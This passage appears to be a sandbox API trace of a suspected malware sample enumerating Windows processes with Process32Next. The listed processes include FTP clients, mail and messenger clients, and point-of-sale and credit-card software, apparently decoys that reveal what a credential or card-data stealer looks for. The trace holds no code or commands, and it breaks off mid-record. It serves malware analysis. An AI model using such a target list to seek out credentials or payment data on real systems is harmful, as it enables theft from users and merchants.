th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.944] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.946] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0213.975] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.977] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.979] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.984] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.986] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.988] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.990] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.992] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0213.995] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0214.000] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0214.002] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.004] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.006] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0214.008] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0214.013] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0214.016] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0214.018] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.020] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0214.022] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0214.024] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.062] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0214.065] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0214.067] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0214.069] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0214.071] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0214.076] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0214.079] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0214.081] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0214.083] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0214.085] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0214.087] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0214.094] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0214.096] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0214.097] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0214.099] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0214.100] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0214.102] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0214.104] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0214.156] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0214.158] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0214.160] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0214.162] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0214.164] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0214.166] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0214.173] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0214.175] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0214.177] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0214.180] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0214.183] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0214.188] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0214.190] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0214.191] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0214.193] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0214.195] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0214.196] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0214.218] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0214.221] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0214.224] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0214.226] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0214.232] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0214.233] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0214.235] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0214.237] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0214.238] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0214.240] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0214.241] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0214.243] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0214.247] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0214.249] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0214.251] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0214.253] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0214.254] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0214.256] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0214.258] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0214.259] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0214.420] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0214.421] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0214.423] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0214.425] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0214.426] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0214.428] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0214.430] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: 